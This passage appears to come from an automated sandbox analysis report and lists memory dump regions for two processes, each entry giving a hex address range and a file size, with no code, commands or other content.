                                                                            • memory/4160-375-0x00007FFD1B240000-0x00007FFD1B265000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/4160-79-0x00007FFD1AF90000-0x00007FFD1AF9D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/4160-376-0x00007FFD23AE0000-0x00007FFD23AEF000-memory.dmp

                                                                              Filesize

                                                                              60KB

                                                                            • memory/4160-74-0x00007FFD1B240000-0x00007FFD1B265000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/4160-72-0x00007FFD0A8F0000-0x00007FFD0AE23000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/4160-70-0x00007FFD0B300000-0x00007FFD0B9C2000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/4160-295-0x00000198D6160000-0x00000198D6693000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/4160-71-0x00007FFD0AE30000-0x00007FFD0AEFE000-memory.dmp

                                                                              Filesize

                                                                              824KB

                                                                            • memory/4160-66-0x00007FFD1AE40000-0x00007FFD1AE73000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/4160-64-0x00007FFD1AFC0000-0x00007FFD1AFCD000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/4160-62-0x00007FFD1AFD0000-0x00007FFD1AFE9000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/4160-60-0x00007FFD1A8C0000-0x00007FFD1AA3F000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/4160-81-0x00007FFD0A7D0000-0x00007FFD0A8EA000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/4160-56-0x00007FFD1FD50000-0x00007FFD1FD69000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/4160-54-0x00007FFD1B020000-0x00007FFD1B04C000-memory.dmp

                                                                              Filesize

                                                                              176KB

                                                                            • memory/4160-32-0x00007FFD23AE0000-0x00007FFD23AEF000-memory.dmp

                                                                              Filesize

                                                                              60KB

                                                                            • memory/4160-77-0x00007FFD1AFA0000-0x00007FFD1AFB4000-memory.dmp

                                                                              Filesize

                                                                              80KB

                                                                            • memory/4160-25-0x00007FFD0B300000-0x00007FFD0B9C2000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/4160-73-0x00000198D6160000-0x00000198D6693000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/4160-82-0x00007FFD1AFF0000-0x00007FFD1B014000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/4160-377-0x00007FFD1B020000-0x00007FFD1B04C000-memory.dmp

                                                                              Filesize

                                                                              176KB

                                                                            • memory/4160-339-0x00007FFD0A7D0000-0x00007FFD0A8EA000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/4160-324-0x00007FFD0B300000-0x00007FFD0B9C2000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/4160-333-0x00007FFD1AE40000-0x00007FFD1AE73000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/4160-330-0x00007FFD1A8C0000-0x00007FFD1AA3F000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/4160-325-0x00007FFD1B240000-0x00007FFD1B265000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/4160-335-0x00007FFD0A8F0000-0x00007FFD0AE23000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/4160-374-0x00007FFD0A7D0000-0x00007FFD0A8EA000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/4160-385-0x00007FFD1AF90000-0x00007FFD1AF9D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/4160-386-0x00007FFD1AFA0000-0x00007FFD1AFB4000-memory.dmp

                                                                              Filesize

                                                                              80KB

                                                                            • memory/4160-384-0x00007FFD0AE30000-0x00007FFD0AEFE000-memory.dmp

                                                                              Filesize

                                                                              824KB

                                                                            • memory/4160-383-0x00007FFD1AE40000-0x00007FFD1AE73000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/4160-382-0x00007FFD1AFC0000-0x00007FFD1AFCD000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/4160-381-0x00007FFD1AFD0000-0x00007FFD1AFE9000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/4160-380-0x00007FFD1A8C0000-0x00007FFD1AA3F000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/4160-379-0x00007FFD1AFF0000-0x00007FFD1B014000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/4160-378-0x00007FFD1FD50000-0x00007FFD1FD69000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/4668-83-0x00007FFD09C53000-0x00007FFD09C55000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/4668-86-0x0000024AF00F0000-0x0000024AF0112000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/4668-94-0x00007FFD09C50000-0x00007FFD0A711000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/4668-95-0x00007FFD09C50000-0x00007FFD0A711000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/4668-112-0x00007FFD09C50000-0x00007FFD0A711000-memory.dmp

                                                                              Filesize

                                                                              10.8MB